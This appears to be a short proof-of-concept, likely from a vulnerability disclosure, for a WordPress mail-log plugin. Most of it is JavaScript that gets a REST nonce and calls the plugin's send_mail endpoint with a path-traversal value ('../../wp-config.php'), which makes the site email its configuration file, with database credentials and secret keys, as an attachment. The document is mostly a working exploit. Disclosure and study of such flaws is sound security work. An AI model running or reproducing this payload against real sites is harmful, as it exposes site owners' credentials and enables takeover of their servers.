Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&{"../../wp-config.php":1}'})).text();